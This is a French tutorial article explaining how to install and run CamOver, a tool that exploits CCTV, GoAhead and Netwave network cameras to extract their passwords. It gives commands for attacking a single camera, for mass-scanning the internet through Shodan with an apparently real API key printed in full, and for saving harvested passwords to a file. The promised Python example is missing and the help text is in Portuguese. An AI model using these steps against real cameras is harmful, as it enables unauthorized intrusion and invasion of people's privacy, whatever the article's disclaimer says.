Maison > Article > développement back-end > CamOver — outil pour exploiter les vulnérabilités des caméras réseau
Aujourd'hui, nous allons parler d'un outil intéressant : CamOver, utilisé pour exploiter les vulnérabilités des caméras réseau, obtenir leurs mots de passe et mener différents types d'attaques. Les attaques ont lieu en exploitant les vulnérabilités des modèles de caméras populaires, tels que CCTV, GoAhead et Netwave. Ci-dessous, j'expliquerai en détail comment installer et utiliser CamOver.
Piratage de caméras réseau avec CamOver
Cet article est destiné uniquement à des fins éducatives et à l’apprentissage du hacking éthique. L'accès non autorisé aux caméras réseau est illégal et considéré comme un crime. Ni le site spy-soft.net ni l'auteur ne sont responsables de vos actes.
Pour installer l'outil, utilisez simplement la commande suivante :
pip3 install git+https://github.com/EntySec/CamOver
Après l'installation, démarrez simplement CamOver avec la commande :
camover
-h, --help Exibe a mensagem de ajuda e sai. -t, --threads Usa multithreading para acelerar o processo. -o OUTPUT, --output OUTPUT Salva os resultados em um arquivo. -i INPUT, --input INPUT Arquivo com endereços das câmeras. -a ADDRESS, --address ADDRESS Um único endereço de câmera. --shodan SHODAN Chave de API do Shodan para explorar câmeras pela internet. --zoomeye ZOOMEYE Chave de API do ZoomEye para explorar câmeras pela internet. -p PAGES, --pages PAGES Número de páginas a ser buscado no ZoomEye.
Supposons qu'il y ait une caméra avec l'adresse IP 192.168.99.100. Pour vérifier s'il peut être exploité, exécutez la commande suivante :
camover -a 192.168.99.100
Pour rechercher des caméras en ligne à l'aide de Shodan, exécutez :
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
La clé API Shodan (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) est fournie à titre d'exemple. Vous pouvez utiliser ceci ou votre propre clé.
Si vous avez une liste d'adresses de caméras dans un fichier appelé caméras.txt, vous pouvez essayer de les explorer et enregistrer les mots de passe obtenus dans passwords.txt :
camover -t -i cameras.txt -o passwords.txt
CamOver fournit également une API Python pour intégrer l'outil dans votre code. L'exemple ci-dessous montre comment créer un objet CamOver, explorer une caméra par IP et afficher les identifiants obtenus :
pip3 install git+https://github.com/EntySec/CamOver
CamOver est un outil puissant pour exploiter les vulnérabilités des caméras réseau. Si ce sujet vous intéresse, il peut constituer une ressource précieuse pour en savoir plus sur la sécurité des réseaux et les tests d’intrusion.
⚠️ Avertissement : Utiliser des outils comme CamOver pour des activités non autorisées est un crime et peut entraîner de lourdes sanctions. Utilisez ces informations uniquement à des fins juridiques et éthiques.
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!